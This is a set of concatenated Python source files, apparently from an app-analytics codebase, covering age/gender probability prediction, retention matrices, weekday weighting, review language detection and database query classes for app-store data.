joint_classes = ['0,0', '0,1', '1,0', '1,1']
if bundle_ids_1 is not None:
aligned_data_1 = process.align_bundle_ids(data, bundle_ids_1)
else:
aligned_data_1 = data
if bundle_ids_2 is not None:
aligned_data_2 = process.align_bundle_ids(data, bundle_ids_2)
else:
aligned_data_2 = data
probability_1 = pd.DataFrame(estimator_1.predict_proba(aligned_data_1), index=aligned_data_1.index)
probability_2 = pd.DataFrame(estimator_2.predict_proba(aligned_data_2), index=aligned_data_2.index)
assert (probability_1.index == probability_2.index).all(), 'Indexes of probabilities should be the same'
joint_probability = pd.concat([probability_2.multiply(probability_1[0], axis='rows'),
probability_2.multiply(probability_1[1], axis='rows')],
axis=1)
joint_probability.columns = joint_classes
return joint_probability
def predict_weekly_proba(usage, device_ids, week_end, *args, **kwargs):
"""
Weekly wrapper for predict_joint_proba().
:param usage: Usage (see data.load_usage())
:param device_ids: List of relevant device ID's
:param week_end: End date of week
:param kwargs: Keyword arguments for predict_joint_proba except for data
:return: DataFrame with weekly joint probability for device ID's
"""
week_start = utils.get_start_date(week_end, 'weekly')
weekly_data = process.get_usage_per_device(usage, device_ids, week_start, week_end)
joint_probability = predict_joint_proba(weekly_data, *args, **kwargs)
return joint_probability
def predict_monthly_proba(usage, device_ids, month_end, *args, **kwargs):
"""
Monthly wrapper for predict_joint_proba() to get average monthly probabilities.
:param usage: Usage (see data.load_usage())
:param device_ids: List of relevant device ID's
:param month_end: End date of month
:param kwargs: Keyword arguments for predict_joint_proba except for data
:return: DataFrame with monthly joint probability for device ID's
"""
weekly_probability = predict_proba_in_month(usage, device_ids, month_end, *args,
**kwargs)
monthly_probability = weekly_probability.groupby('device_id').aggregate('mean')
n_times_present = weekly_probability.device_id.value_counts()
n_weeks_in_month = len(utils.get_weekly_end_dates_in_month(month_end))
valid_device_ids = n_times_present[n_times_present == n_weeks_in_month].index
monthly_probability = monthly_probability.ix[valid_device_ids]
return monthly_probability
def predict_proba_in_month(usage, device_ids, month_end, *args, **kwargs):
"""
Monthly wrapper for predict_weekly_proba() to get all weekly probabilities in a month.
:param usage: Usage (see data.load_usage())
:param device_ids: List of relevant device ID's
:param month_end: End date of month
:param kwargs: Keyword arguments for predict_joint_proba except for data
:return: DataFrame with weekly joint probabilities in the month for device ID's
"""
week_end_dates = utils.get_weekly_end_dates_in_month(month_end)
probability_list = []
for week_end in week_end_dates:
weekly_probability = predict_weekly_proba(usage, device_ids, week_end, *args,
**kwargs)
weekly_probability['end_date'] = week_end
probability_list.append(weekly_probability.reset_index())
return pd.concat(probability_list, axis=0, ignore_index=True)<file_sep>/financial-product-benchmark/automated-QA/classes.py
from IPython.html import widgets
from IPython.display import display, clear_output
from collections import OrderedDict
import matplotlib.pyplot as plt
import datetime
import seaborn as sns
sns.set(font="serif")
from itertools import product
def plot_curves(store, country, end_date, device_feed, data, min_rank=1, max_rank=1000, ax=None, scale='log'):
sel = (data.store == store)&(data.country == country)&\
(data.end_date == end_date)&(data.device_feed == device_feed)&\
(data['rank']>=min_rank)&(data['rank']<=max_rank)
if ax is None:
f,ax = plt.subplots()
ax.plot(data[sel]['rank'],data[sel].value_cla,'b-',label='classic')
ax.plot(data[sel]['rank'],data[sel].value_fin,'g-',label='financial')
ax.legend()
ax.set_xscale(scale)
ax.set_yscale(scale)
ax.set_xlim(min_rank,max_rank)
ax.set_title(store+' - '+country+' - '+end_date+' - '+device_feed,fontsize=16)
ax.set_xlabel('rank',fontsize=12)
ax.set_ylabel('estimate',fontsize=12)
f.set_size_inches(7,4)
return ax
class CurveViewer(object):
def __init__(self, data):
self.data = data
self.updating_all_lists = False
self.create_dropdowns()
self.populate_stores_dropdown()
self.displayed_data = None
def _ipython_display_(self):
"""
Called when display() or pyout is used to display the GUI.
"""
self.control_panel._ipython_display_()
def create_dropdowns(self):
self.stores_dropdown = widgets.DropdownWidget()
self.stores_dropdown.on_trait_change(self.change_handler, 'value')
self.countries_dropdown = widgets.DropdownWidget()
self.countries_dropdown.on_trait_change(self.change_handler, 'value')
self.end_dates_dropdown = widgets.DropdownWidget()
self.end_dates_dropdown.on_trait_change(self.change_handler, 'value')
self.device_feeds_dropdown = widgets.DropdownWidget()
self.device_feeds_dropdown.on_trait_change(self.change_handler, 'value')
self.dropdown_container = widgets.ContainerWidget()
self.dropdown_container.children = [self.stores_dropdown,self.countries_dropdown,
self.end_dates_dropdown,self.device_feeds_dropdown]
self.dropdown_container._css = {'': {'width': '100%', 'flex-direction': 'row',
'justify-content': 'center', 'align-items': 'center',
'margin-bottom': '5px'},
'.widget-hbox-single': {'margin': '0px'}}
def change_handler(self, *args):
if self.updating_all_lists == False:
self.updating_all_lists = True
self.populate_countries_dropdown()
self.populate_end_dates_dropdown()
self.populate_device_feeds_dropdown()
self.execute_function()
self.updating_all_lists = False
def populate_stores_dropdown(self):
stores = self.data.store.unique()
self.stores_dropdown.values=OrderedDict(zip(stores,stores))
def populate_countries_dropdown(self, *args):
self.stores_sel = self.data.store == self.stores_dropdown.value
countries = self.data[self.stores_sel].country.unique()
self.countries_dropdown.values = OrderedDict(zip(countries,countries))
def populate_end_dates_dropdown(self, *args):
self.end_dates_sel = self.stores_sel&(self.data[self.stores_sel].country == self.countries_dropdown.value)
end_dates = self.data[self.end_dates_sel].end_date.unique()
self.end_dates_dropdown.values = OrderedDict(zip(end_dates,end_dates))
def populate_device_feeds_dropdown(self, *args):
self.device_feeds_sel = self.end_dates_sel&(self.data[self.end_dates_sel].end_date == self.end_dates_dropdown.value)
device_feeds = self.data[self.device_feeds_sel].device_feed.unique()
self.device_feeds_dropdown.values = OrderedDict(zip(device_feeds,device_feeds))
def execute_function(self, *args):
data_sel = self.device_feeds_sel&(self.data[self.device_feeds_sel].device_feed == self.device_feeds_dropdown.value)
store = self.stores_dropdown.value
country = self.countries_dropdown.value
end_date = self.end_dates_dropdown.value
device_feed = self.device_feeds_dropdown.value
clear_output(wait=True)
self.displayed_data = self.data[data_sel]
plot_curves(store, country, end_date, device_feed, self.displayed_data)
def _ipython_display_(self):
"""
Called when display() or pyout is used to display the GUI.
"""
self.dropdown_container._ipython_display_()<file_sep>/weekly_weights/preview_weights.py
'''
Created on May 22, 2013
@author: perezrafael
'''
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import config
import sys
if __name__ == '__main__':
'''python preview_weights.py ios /path/to/file.csv
argv[1] = platform (ios or android)
argv[2] = file
OUTPUT: csv with preview_weights
pdf charts for visualization
This script will load the csv resulting from weights.py,
then average all the units per weekday, and divide by the average of all units.
This results on preivew weights for the period covered by the file
'''
platform = sys.argv[1]
file = sys.argv[2]
plot = False
df = pd.read_csv(file)
period_mean = df[['unit', 'store_id', 'units']].groupby(['unit', 'store_id']).mean().reset_index()
period_mean.rename(columns={'units':'yearly_mean'}, inplace=True)
mean_weights = df[['count', 'weight', 'store_id', 'unit', 'units', 'weekday', 'weekly_mean']].groupby(['unit', 'store_id', 'weekday']).mean().reset_index()
mean_weights = mean_weights.merge(period_mean, on=['unit', 'store_id'])
mean_weights['preview_weight'] = (mean_weights['units']*1.0)/mean_weights['yearly_mean']
mean_weights.to_csv('preview_weights_%s.csv'%platform, index=False)
total_countries = mean_weights['store_id'].drop_duplicates().shape[0]
gdf1 = mean_weights.groupby('store_id')
if plot:
fig, axarr = plt.subplots(total_countries, 2)
weekdays = mean_weights[['weekday']].drop_duplicates()
count=0
result = []
for n1, g1 in gdf1:
if platform == 'ios':
country = config.IOS_STORES_DICT[n1]
elif platform == 'android':
country = config.ANDROID_STORES_DICT[n1]
downloads = g1[g1['unit']=='downloads']
downloads = downloads.merge(weekdays, on='weekday', how='right')
downloads['preview_weight'] = downloads['preview_weight'].fillna(1.0)
downloads['store_id'] = np.int64(n1)
downloads['unit'] = 'downloads'
if plot:
axarr[count,0].plot(downloads['weekday'], downloads['preview_weight'], linestyle='-', marker='o')
axarr[count,0].set_title('%s downloads'%country)
axarr[count,0].set_ylim(0.8, 1.2)
usd = g1[g1['unit']=='usd']
usd = usd.merge(weekdays, on='weekday', how='right')
usd['preview_weight'] = usd['preview_weight'].fillna(1.0)
usd['store_id'] = np.int64(n1)
usd['unit'] = 'usd'
if plot:
axarr[count,1].plot(usd['weekday'], usd['preview_weight'], linestyle='-', marker='o')
axarr[count,1].set_title('usd')
axarr[count,1].set_ylim(0.8, 1.2)
result.append(downloads)
result.append(usd)
count +=1
result = pd.concat(result)
result['weekday'] = np.int64(result['weekday'])
result['store_id'] = np.int64(result['store_id'])
result.to_csv('preview_weights_%s.csv'%platform, index=False)
if plot:
plt.setp([a.get_xticklabels() for a in axarr[0:, :].reshape(1,total_countries*2)[0]], visible=False)
fig.set_size_inches(10, total_countries*2)
fig.tight_layout()
plt.savefig('preview_weights_%s.pdf'%platform)
#plt.show()<file_sep>/audience/legacy_experiments/predict_language.py
# -*- coding: utf-8 -*-
# <nbformat>3.0</nbformat>
# <codecell>
import nltk
import pandas as pd
import random
import re
import numpy as np
from unidecode import unidecode
from guess_language import guess_language
import enchant
import psycopg2
import argparse
def guess_lang(text):
try:
return guess_language(text.decode('utf-8'))
except:
return ''
def main():
parser = argparse.ArgumentParser(description='Predict the language of a text in db and put it int p_language for that database')
parser.add_argument('-t','--target_table', help='Table to update name in db', required=True)
parser.add_argument('-i','--index_table', help='Main review table', required=True)
parser.add_argument('-s','--store_id', help='Store ID', type=int, required=True)
parser.add_argument('-f','--field', help='Column name with the text we want to predict language', required=True)
parser.add_argument('-c','--connection', help='Connection string to pass to postgres', required=True)
args = vars(parser.parse_args())
#CONN=psycopg2.connect('dbname=aa_reviews_android user=aa host=10.38.48.144 port=5432')
conn = psycopg2.connect(args['connection'])
cur1 = conn.cursor()
conn2 = psycopg2.connect(args['connection'])
cur2 = conn2.cursor()
target_table = args['target_table']
index_table = args['index_table']
store_id = args['store_id']
column = args['field']
if column=='reviewer':
query1 = 'SELECT t.reviewer FROM %s t, %s i WHERE t.p_language=%%s and t.reviewer=i.reviewer and i.store_id=%%s'%(target_table, index_table)
query2 = 'UPDATE %s SET p_language=%%s WHERE reviewer=%%s'%(target_table)
else:
query1 = 'SELECT t.%s, t.id FROM %s t, %s i WHERE t.p_language=%%s and t.id=i.id and i.store_id=%%s'%(column, target_table, index_table)
query2 = 'UPDATE %s SET p_language=%%s WHERE id=%%s'%(target_table)
params1 = ('-', store_id)
print cur1.mogrify(query1, params1)
cur1.execute(query1, params1)
for row in cur1:
if row == None:
continue
if row[0]==None:
continue
p_language = guess_lang(row[0])
if column=='reviewer':
params2 = (p_language, row[0])
else:
params2 = (p_language, row[1])
print cur2.mogrify(query2, params2)
cur2.execute(query2, params2)
conn2.commit()
conn.close()
conn2.close()
if __name__ == '__main__':
main()
<file_sep>/publisher_cv/compare_pc_estimates.py
import pandas as pd
import numpy as np
def main():
store_id = '143441'
dir = '/Users/perezrafael/appannie/data/estimates_public_companies'
file = '%s/res_stg_%s_v1.csv'%(dir, store_id)
df = pd.read_csv(file)
df['t1e'] = df['t1e'].fillna(0)
df['t2e'] = df['t1e'].fillna(0)
df['estimate_financial'] = df['t1e'] + df['t2e']
df['estimate_original'] = df['Daily.Estimate']
df2 = df.groupby(['store_id', 'feed_id', 'app_id', 'date']).mean().reset_index()
df2 = df2[['store_id', 'feed_id', 'app_id', 'date', 'estimate_financial', 'estimate_original']]
df = df[['store_id', 'feed_id', 'app_id', 'date', 'category_id', 'iphone_rank', 'ipad_rank', 'actual']]
df = df.merge(df2, on=['store_id', 'feed_id', 'app_id', 'date'])
del df2
df['rank_range'] = '201 to end'
df['rank_range'][(df['iphone_rank']<201) | (df['ipad_rank']<201)] = '21 to 200'
df['rank_range'][(df['iphone_rank']<21) | (df['ipad_rank']<21)] = '11 to 20'
df['rank_range'][(df['iphone_rank']<11) | (df['ipad_rank']<11)] = '1 to 10'
df['estimates_diff'] = df['estimate_financial'] - df['estimate_original']
df['estimates_abs_diff'] = df['estimates_diff'].abs()
df['estimates_rel_diff'] = (df['estimates_diff']*1.0) / df['estimate_original']
df['estimates_abs_rel_diff'] = df['estimates_rel_diff'].abs()
df.to_csv('%s/estimates_comparison_%s.csv'%(dir, store_id), index=False)
if __name__ == '__main__':
main()
<file_sep>/int-vs-m-benchmark/lib/my_functions.py
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from distimo_clients import mysqldb
from collections import OrderedDict
import lib.my_classes as mc
from IPython.display import display, clear_output
import matplotlib.pyplot as plt
def get_value(rank, curve_model):
if type(curve_model).__name__ == 'dict':
rank = str(rank)
result = curve_model[rank] if rank in curve_model else min(curve_model.values())
else:
for r, param in curve_model:
if r > rank:
break
result = param[0] * (rank ** param[1])
return result
def plot_weekly_model(obj, data, sel_columns, scale='log'):
def plot_axes():
clear_output(wait=True)
f,axes = plt.subplots(1, 2, sharey=True)
f.set_size_inches(15, 5)
f.suptitle(' - '.join(data[sel_columns].astype(str).values[0]), fontsize=16)
cats = [obj.func_container.children[0].value,
obj.func_container.children[1].value]
max_estimates = []
for i,cat in enumerate(cats):
ax = axes[i]
sel_data = data[data['category'] == cat]
model = eval(sel_data.model.values[0])
rank_data = eval(sel_data.weekly_avg.values[0])
ranking = np.arange(1,sel_data.max_rank.values+1)
df = pd.DataFrame(ranking, columns = ['ranking'])
df['estimate'] = df['ranking'].apply(get_value, args=(model,))
df['weekly_avg'] = df['ranking'].apply(lambda x: rank_data[str(x)] if rank_data.has_key(str(x)) else None)
ax.plot(df['ranking'],df['estimate'], label='estimate')
ax.plot(df['ranking'],df['weekly_avg'], 'xr', label = 'weekly_avg')
max_estimates.append(df['estimate'].max())
ax.set_xscale(scale)
ax.set_yscale(scale)
ax.set_title(cat)
axes[0].set_ylim(0, max(max_estimates)+10)
categories = data.category.unique().tolist()
if len(obj.container.children) == 1:
obj.func_container = mc.widgets.ContainerWidget()
obj.func_container._css = {'': {'width': '100%', 'flex-direction': 'row',
'justify-content': 'center', 'align-items': 'center',
'margin-bottom': '5px'},
'.widget-hbox-single': {'margin': '5px'}}
obj.container.children = tuple(list(obj.container.children)+[obj.func_container])
children =[]
for i in range(2):
dropdown = mc.Dropdown()
dropdown.values = OrderedDict(zip(categories, categories))
if i == 0:
dropdown.value = 'Top Overall'
dropdown.on_trait_change(plot_axes, 'value')
children.append(dropdown)
obj.func_container.children = children
plot_axes()
<file_sep>/aa_au_model/lib/sample_monitoring.py
__author__ = 'jjanssen'
import numpy as np
import pandas as pd
from matplotlib import pyplot as plt
from itertools import count
def construct_feature_matrix(df, feature):
"""
creates a binary matrix which indicates whether the index has a certain property
:param df: a dataframe containing at least a device_id and a 'feature' per row
:param feature: the column name of the feature
:return: a dataframe containing: per device_id (row) whether its has (1) or has not (0) a feature (column)
"""
df['is_feature'] = 1
result = pd.pivot_table(data=df, index='device_id', columns=[feature], values='is_feature', fill_value=0)
return result
def calc_ration_per_day(row):
new_devices = row['new_devices']
first_active_date = row['first_active_date']
row['new_devices'] = 1
row['first_active_date'] = 1
row = row / new_devices
row['new_devices'] = new_devices
row['first_active_date'] = first_active_date
return row
def retention_matrix_shaper(df):
# move new_device to front
new_devices = df['new_devices']
df.drop(labels=['new_devices'], axis=1,inplace = True)
df.insert(0, 'new_devices', new_devices)
# remove NaN, shift cols left
c = count()
new_devices = df['new_devices']
first_active_date = df['first_active_date']
df = df.apply(lambda x: x.shift(-c.next() + 1), 1)
df.drop(labels=['new_devices'], axis=1,inplace = True)
df.drop(labels=['first_active_date'], axis=1,inplace = True)
df.insert(0, 'new_devices', new_devices)
df.insert(0, 'first_active_date', first_active_date)
df.reset_index(inplace=True)
return df
def mask_generator(mask, activity_matrix):
# generate masks, mask has length equal to number of dates, num masks
mask_length = mask.shape[0]
row_length = activity_matrix.shape[1]
zeroes_array = np.zeros(row_length, dtype=np.int)
num_mask = row_length - mask_length + 1
result_mask = np.array([], dtype=np.int)
mask_range = range(1, 1 + num_mask)
for n in mask_range:
row = np.append(zeroes_array[0:n-1], mask)
row = np.append(row, zeroes_array[0:row_length - n + 1 - mask_length])
result_mask = np.append(result_mask, row)
return result_mask.reshape(num_mask, row_length)
def calculate_retention_au(df, platform_device_list):
"""
Function that calculates a retention matrix for active devices
:param df: dataframe containing information on active devices as retrieved by EMR query 'ad_device_retention.sql'
:param platform_device_list: a list of platforms and devices for which to make a retention matrix
:return: a dataframe
"""
for pdl in platform_device_list:
if (pdl == 'iOS'):
pdl_df = df[(df['platform'] == 'iOS') & (df['first_active_date'] >= '2014-10-23')]
if (pdl == 'iPhone'):
pdl_df = df[(df['platform'] == 'iOS') & (df['type'] == 'Smartphone') & (df['first_active_date'] >= '2014-10-23')]
if (pdl == 'iPad'):
pdl_df = df[(df['platform'] == 'iOS') & (df['type'] == 'Tablet') & (df['first_active_date'] >= '2014-10-23')]
if (pdl == 'Android'):
pdl_df = df[(df['platform'] == 'Android') & (df['first_active_date'] >= '2014-12-18')]
unique_devices = pdl_df['device_id'].unique().tolist()
pdl_df_unique_devices = pdl_df[pdl_df.device_id.isin(unique_devices)]
# group by active_date an device_id to determine activity
grouped_date_device = pdl_df_unique_devices.groupby(by=['active_date', 'device_id']).count()
grouped_date_device.reset_index(inplace=True)
grouped_date_device = grouped_date_device[['active_date', 'device_id', 'first_active_date']]
# group by device_id and first_active_date to determine first_active_date
grouped_fa_date_device = pdl_df_unique_devices.groupby(by=['device_id', 'first_active_date']).count()
grouped_fa_date_device.reset_index(inplace=True)
grouped_fa_date_device = grouped_fa_date_device[['device_id', 'first_active_date']]
# construct NxM matrix for N devices and M dates
device_date_activity = construct_feature_matrix(grouped_date_device, 'active_date')
device_date_activity_matrix = device_date_activity.as_matrix()
# generate 'masks' for previous and subsequent days
prev_mask_format = np.array([1,1,1,1,1,1,1,0,0,0,0], dtype=np.int)
prev_mask = mask_generator(prev_mask_format, device_date_activity_matrix)
sub_mask_format = np.array([0,0,0,0,0,0,0,0,1,1,1], dtype=np.int)
sub_mask = mask_generator(sub_mask_format, device_date_activity_matrix)
# apply masks to device_activity matrix & sum both matrices
prev_activity_matrix = device_date_activity_matrix.dot(prev_mask.T)
sub_activity_matrix = device_date_activity_matrix.dot(sub_mask.T)
prev_activity_matrix = prev_activity_matrix > 0
sub_activity_matrix = sub_activity_matrix > 0
masked_activity_matrix = prev_activity_matrix & sub_activity_matrix
# select appropriate dates as columns
date_columns = device_date_activity.columns.tolist()
retention_dates = date_columns[3:device_date_activity_matrix.shape[1]-7]
retention_df = pd.DataFrame(data=masked_activity_matrix, index=device_date_activity.index, columns=retention_dates)
retention_df = retention_df[retention_df == True]
# introduce startdate again
retention_df_startdate = grouped_fa_date_device.merge(retention_df, left_on='device_id', right_index='device_id')
# sum all devices per startdate
retention_df_startdate['new_devices'] = 1
retention_per_startdate = retention_df_startdate.groupby(by='first_active_date').sum()
retention_per_startdate.reset_index(inplace=True)
# rearrange structure of matrix
shaped_retention_matrix = retention_matrix_shaper(retention_per_startdate)
# calculate retention
shaped_retention_matrix = shaped_retention_matrix.apply(calc_ration_per_day, axis=1)
return shaped_retention_matrix, retention_per_startdate
def create_weekly_retention_matrix(weekly_devices, all_devices):
"""
Function that creates a weekly retention matrix using:
* 'weekly_devices' which is the weekly active devices as exported every week
* 'all_devices' which is are the active devices as retrieved by EMR query 'ad_device_retention.sql'
:param weekly_devices: dataframe containing information on weekly active devices
:param all_devices: dataframe containing informnation on daily active devices
:return: a dataframe containing a weekly retention matrix
"""
# create weekly retention matrix
weekly_retention = all_devices.merge(weekly_devices, on='device_id', how='left')
weekly_retention['dummy'] = 1
weekly_retention = weekly_retention.pivot_table(values = 'dummy', index='device_id', columns='end_date', fill_value=0)
weekly_retention.reset_index(inplace=True)
# merge with 'first_week_date'
weekly_retention = all_devices[['device_id', 'first_week_date']].merge(weekly_retention, on='device_id', how='left')
weekly_retention.fillna(value=0, inplace=True)
fad = weekly_retention.first_week_date
weekly_retention.drop(labels = 'first_week_date', axis=1, inplace=True)
weekly_retention.insert(1,'first_week_date', fad)
weekly_retention.sort(columns='first_week_date', inplace=True)
return weekly_retention
def plot_weekly_active_devices(weekly_devices, first_active_dates):
# number of devices that contribute to the sample, create weekly retention matrix based on all devices
weekly_retention = create_weekly_retention_matrix(weekly_devices, first_active_dates)
# calculate proportion of devcies which contribute to the sample per week that they joined the sample
mean_retention = weekly_retention.groupby('first_week_date').mean()
mean_retention.reset_index(inplace=True)
# calculate device influx per week, add to mean retention
devices_per_week = weekly_retention[['device_id','first_week_date']].groupby('first_week_date').count()
devices_per_week.reset_index(inplace=True)
devices_per_week.rename(columns={'device_id':'device_influx'}, inplace=True)
mean_retention = mean_retention.merge(devices_per_week, on='first_week_date')
# see which colums represent weeks, itereate over weeks to see contribution per week, plot
weeks = mean_retention.columns.values.tolist()
weeks.remove('first_week_date')
weeks.remove('device_influx')
device_contribution_over_weeks = pd.DataFrame()
for i, w in enumerate(weeks):
new_row = [[weeks[i], mean_retention[w].mul(mean_retention.device_influx, axis=0).sum()]]
new_df = pd.DataFrame(data=new_row, columns= ['week', 'contributing_devices'])
device_contribution_over_weeks = device_contribution_over_weeks.append(new_df)
plt.ioff()
fig = plt.Figure()
device_contribution_over_weeks.plot(x='week', y='contributing_devices', figsize=(15,8))
plt.xlabel('date')
plt.ylabel('Number of devices')
plt.title('Number of devices contributing to weekly estimates')
return mean_retention, device_contribution_over_weeks,fig
def plot_age_gender_contribution(avg_retention_per_week, probabilities, weekly_devices, all_devices):
# calculate weekly retention
weekly_retention = create_weekly_retention_matrix(weekly_devices, all_devices)
# do the same, but use age gender probabilities now to see who is contributing
# use latest age/gender estimate per device
age_gender_col = ['female,old','female,young', 'male,old', 'male,young']
probability_columns = ['device_id'] + age_gender_col
# see which colums represent weeks, itereate over weeks to see contribution per week, plot
weeks = avg_retention_per_week.columns.values.tolist()
to_remove = ['first_week_date', 'device_influx'] + age_gender_col
for w in weeks:
if w in to_remove:
weeks.remove(w)
age_gender_contribution_over_weeks = pd.DataFrame()
for i, w in enumerate(weeks):
used_probabalities = probabilities[probability_columns][probabilities.end_date == w]
age_gender_retention = weekly_retention.merge(used_probabalities, on='device_id')
age_gender_retention.columns = ['device_id', 'first_week_date'] + weeks + age_gender_col
fo = age_gender_retention[w].mul(age_gender_retention['female,old'], axis=0).sum()
fy = age_gender_retention[w].mul(age_gender_retention['female,young'], axis=0).sum()
mo = age_gender_retention[w].mul(age_gender_retention['male,old'], axis=0).sum()
my = age_gender_retention[w].mul(age_gender_retention['male,young'], axis=0).sum()
new_row = [[weeks[i], fo, fy, mo, my]]
new_df = pd.DataFrame(data=new_row, columns= ['week'] + age_gender_col)
age_gender_contribution_over_weeks = age_gender_contribution_over_weeks.append(new_df)
pct_col = ['% female,old','% female,young', '% male,old', '% male,young']
age_gender_contribution_over_weeks['total_devices'] = age_gender_contribution_over_weeks[age_gender_col].sum(axis=1)
age_gender_contribution_over_weeks[pct_col] = age_gender_contribution_over_weeks[age_gender_col].divide(age_gender_contribution_over_weeks.total_devices,axis=0) * 100
plt.ioff()
age_gender_absolute = age_gender_contribution_over_weeks.plot(x='week', y=age_gender_col, figsize=(15,7))
plt.ylabel('Number of devices')
plt.xlabel('Date')
plt.legend()
plt.title('Absolute weekly contribution per estimated age / gender')
age_gender_percentage = age_gender_contribution_over_weeks.plot(x='week', y=pct_col, figsize=(15,7))
plt.ylabel('Percentage of devices')
plt.xlabel('Date')
plt.legend()
plt.title('Percetage weekly contribution per estimated age / gender')
return age_gender_contribution_over_weeks.tail(),age_gender_absolute, age_gender_percentage
def plot_nth_week_age_gender_retention(probabilities, weekly_sample_devices, n):
"""
:param probabilities: dataframe containing estimated age gender probabilities per week
:param weekly_sample_devices: dataframe contained weekly active devices
:param n: nth week retention, 1st week is indexed to 100%
:return:
"""
probabilities_copy = probabilities.copy()
weekly_sample_devices_copy = weekly_sample_devices.copy()
age_bins = ['female,old','female,young','male,old','male,young']
probabilities_copy.end_date = probabilities_copy.end_date.apply(lambda x: x.strftime("%Y-%m-%d"))
weekly_sample_devices_copy.end_date = weekly_sample_devices_copy.end_date.apply(lambda x: x.strftime("%Y-%m-%d"))
# create weekly retention matrix
ag_retention = weekly_sample_devices_copy.merge(probabilities_copy[['device_id','end_date'] + age_bins], on=['device_id','end_date'])
result = pd.DataFrame()
# determine the first week that an device was active
min_date_per_device = ag_retention[['device_id','end_date']].groupby('device_id').min()
min_date_per_device.reset_index(inplace=True)
for i, a in enumerate(age_bins):
print i,a
# determine per device in which week they were active
ag_pivot = ag_retention.pivot_table(values = a, index='device_id', columns='end_date')
weeks = ag_retention.end_date.unique().tolist()
ag_pivot.reset_index(inplace=True)
ag_first_date = ag_pivot.merge(min_date_per_device, on=['device_id'])
ag_first_date_summed = ag_first_date.groupby('end_date').sum()
ag_first_date_summed.reset_index(inplace=True)
c = count()
ag_first_date_summed[weeks] = ag_first_date_summed[weeks].apply(lambda x: x.shift(-c.next() + 1), 1)
ag_first_date_summed['age_bin'] = a
week_numbers = range(1, len(ag_first_date_summed.columns.values.tolist())-1,1)
ag_first_date_summed.columns = ['first_week_date'] + week_numbers + ['age_bin']
ag_first_date_summed[week_numbers[0:]] = ag_first_date_summed[week_numbers[0:]].divide(ag_first_date_summed[1], axis=0)
result = result.append(ag_first_date_summed)
fig = plt.figure(figsize=(15,8))
for key, grp in result.groupby('age_bin'):
plt.plot(grp.index, grp[n]*100)
plt.xticks(grp.index, grp.first_week_date, rotation=45)
plt.xlabel('Week')
plt.ylabel('Retention percentage')
plt.title('Retention for estimated age gender over time')
plt.legend(age_bins)
return fig<file_sep>/exact-matching-improvement/icon_lib/database_interface.py
import config
import MySQLdb
import os
import pandas as pd
import psycopg2
from queries import app_annie_queries, distimo_queries
class DatabaseInterface():
"""
Class defining interactions with the database.
"""
def query_all_matches(self):
raise NotImplementedError("Method not implemented.")
def query_app_info(self):
raise NotImplementedError("Method not implemented.")
def query_matched_apps(self):
raise NotImplementedError("Method not implemented.")
class DistimoDatabase(DatabaseInterface):
"""
Class to interface with Distimo's database.
:param connection: Connection object to MySQL database
:param db_parameters: Dictionary with DB parameters used when calling Mysqldb.connect() if no connection is given
"""
def __init__(self, connection=None, db_parameters=config.DISTIMO_DB_PARAMETERS):
if connection is None:
self.connection = MySQLdb.connect(**db_parameters)
else:
self.connection = connection
def query_all_matches(self):
"""
Query all matches.
:return: All matches DataFrame with columns from_market, from_app_id, to_market, to_app_id
:rtype: pd.DataFrame
"""
return pd.read_sql(distimo_queries['matches'], self.connection)
def query_app_info(self):
"""
Query app info.
:return: App info DataFrame with columns market, app_id, name and publisher
:rtype: pd.DataFrame
"""
return pd.read_sql(distimo_queries['app_info'], self.connection)
def query_matched_apps(self):
"""
Query matched apps
:return: Matched apps DataFrame with columns market, app_id and icon_url
:rtype: pd.DataFrame
"""
return pd.read_sql_query(distimo_queries['matched_app_query'], self.connection)
class AppAnnieDatabase(DatabaseInterface):
"""
Class to interface with AppAnnie's databases.
:param aa_connection:
:param aa_android_connection:
:param db_parameters:
"""
def __init__(self, aa_connection=None, aa_android_connection=None, db_parameters=config.APPANNIE_DB_PARAMETERS):
self.db_parameters = db_parameters
if aa_connection is None or aa_android_connection is None:
aa_parameters = db_parameters.copy()
aa_parameters['database'] = 'aa'
self.aa_connection = psycopg2.connect(**aa_parameters)
aa_android_parameters = db_parameters.copy()
aa_android_parameters['database'] = 'aa_android'
self.aa_android_connection = psycopg2.connect(**aa_android_parameters)
else:
self.aa_connection = aa_connection
self.aa_android_connection = aa_android_connection
self._create_db_link_from_aa_to_aa_android(self.db_parameters)
def query_all_matches(self):
"""
Query all matches.
:return: All matches DataFrame with columns from_market, from_app_id, to_market, to_app_id
:rtype: pd.DataFrame
"""
return pd.read_sql(app_annie_queries['matches'], self.aa_connection)
def query_app_info(self):
"""
Query app info.
:return: App info DataFrame with columns market, app_id, name and publisher
:rtype: pd.DataFrame
"""
android_info = self._query_android_info()
ios_info = self._query_ios_info()
return pd.concat([android_info, ios_info], axis=0, ignore_index=True)
def query_matched_apps(self):
"""
Query matched apps
:return: Matched apps DataFrame with columns market, app_id and icon_url
:rtype: pd.DataFrame
"""
matched_android_apps = self._query_android_matched_apps()
matched_ios_apps = self._query_ios_matched_apps()
matched_apps = pd.concat([matched_android_apps, matched_ios_apps], axis=0, ignore_index=True)
check_icon_paths = lambda x: os.path.exists('icons/' + x.market + '/' + str(x.app_id))
icon_is_scraped = matched_apps.apply(check_icon_paths, axis=1)
valid_matched_apps = matched_apps.ix[icon_is_scraped].reset_index(drop=True)
return valid_matched_apps[['app_id', 'market', 'icon_url', 'name']]
def _create_db_link_from_aa_to_aa_android(self, db_parameters):
"""
Create a DBlink to the aa database from the aa_android database.
:param db_parameters:
:return: None
"""
android_cursor = self.aa_android_connection.cursor()
db_link_query = app_annie_queries['dblink_aa_to_aa_android'].format(user=db_parameters['user'],
host=db_parameters['host'],
password=db_parameters['password'])
android_cursor.execute(db_link_query)
def _query_android_info(self):
"""
Query app info for Android apps.
:return: App info DataFrame with columns market, app_id, name and publisher
:rtype: pd.DataFrame
"""
return pd.read_sql(app_annie_queries['app_info_android'], self.aa_android_connection)
def _query_ios_info(self):
"""
Query app info for iOS apps.
:return: App info DataFrame with columns market, app_id, name and publisher
:rtype: pd.DataFrame
"""
return pd.read_sql(app_annie_queries['app_info_ios'], self.aa_connection)
def _query_android_matched_apps(self):
"""
Query matched Android apps.
:return: Matched Android apps DataFrame
"""
matched_android_apps = pd.read_sql(app_annie_queries['matched_app_android'], self.aa_android_connection)
matched_android_apps['icon_url'] = self._set_android_icon_size(matched_android_apps)
matched_android_apps.dropna(axis=0, inplace=True)
matched_android_apps = self._remove_invalid_icon_urls(matched_android_apps, '64')
return matched_android_apps
def _set_android_icon_size(self, matched_android_apps):
"""
